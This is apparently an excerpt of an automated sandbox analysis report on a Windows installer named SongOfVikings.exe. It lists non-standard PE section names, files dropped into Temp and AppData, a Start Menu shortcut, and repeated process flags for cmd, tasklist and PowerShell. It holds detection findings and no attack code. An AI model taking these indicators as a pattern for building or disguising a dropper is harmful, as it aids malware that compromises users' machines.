SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0. source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1834103716.0000000005A90000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1833977942.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1835988710.0000000005AD0000.00000004.00001000.00020000.00000000.sdmp

PE file contains sections with non-standard names

Source: SongOfVikings.exe.0.dr	Static PE information: section name: .00cfg
Source: SongOfVikings.exe.0.dr	Static PE information: section name: .gxfg
Source: SongOfVikings.exe.0.dr	Static PE information: section name: .retplne
Source: SongOfVikings.exe.0.dr	Static PE information: section name: .rodata
Source: SongOfVikings.exe.0.dr	Static PE information: section name: CPADinfo
Source: SongOfVikings.exe.0.dr	Static PE information: section name: LZMADEC
Source: SongOfVikings.exe.0.dr	Static PE information: section name: _RDATA
Source: SongOfVikings.exe.0.dr	Static PE information: section name: malloc_h
Source: ffmpeg.dll.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr	Static PE information: section name: _RDATA
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .00cfg
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .gxfg
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .retplne
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: .rodata
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: CPADinfo
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: LZMADEC
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: _RDATA
Source: SongOfVikings.exe0.0.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr	Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr	Static PE information: section name: _RDATA
Source: f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node.5.dr	Static PE information: section name: _RDATA
Source: db56a95c-619a-410d-ad51-8448947b0929.tmp.node.5.dr	Static PE information: section name: _RDATA

Drops PE files

Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\SongOfVikings.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node			Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node			Jump to dropped file

Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\LICENSE.electron.txt			Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\SongOfVikings.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SongOfVikings.lnk

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
